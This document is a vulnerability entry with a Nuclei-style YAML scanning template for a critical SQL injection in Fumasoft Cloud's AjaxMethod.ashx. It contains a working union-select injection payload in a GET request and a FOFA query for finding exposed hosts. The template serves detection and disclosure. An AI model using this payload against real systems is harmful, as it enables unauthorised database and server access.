漏洞描述
There is a SQL injection vulnerability in the AjaxMethod.ashx file of Fumasoft Cloud. Attackers can obtain server permissions through the vulnerability
fumasoft-sqli: Fumasoft Cloud - SQL Injection
PoC代码[已公开]
id: fumasoft-sqli
info:
name: Fumasoft Cloud - SQL Injection
author: ritikchaddha
severity: critical
description: |
There is a SQL injection vulnerability in the AjaxMethod.ashx file of Fumasoft Cloud. Attackers can obtain server permissions through the vulnerability
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-89
metadata:
max-request: 1
verified: true
fofa-query: title="Fumeng Cloud"
tags: fumasoft,sqli,vuln
variables:
num: "999999999"
http:
- method: GET
path:
- "{{BaseURL}}/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y'+union+select+substring(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','{{num}}')),3,32)--"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'
- type: status
status:
- 500
# digest: 4a0a0047304502210089ca10e7e8608a38997b910961aa9ba4c2a2b920c313bb532da5201db0600a4602200b449463c27277796959d1ffb361bac7b16c1a48a613e14e8dfc1452bed4a042:922c64590222798bb761d5b6d8e72950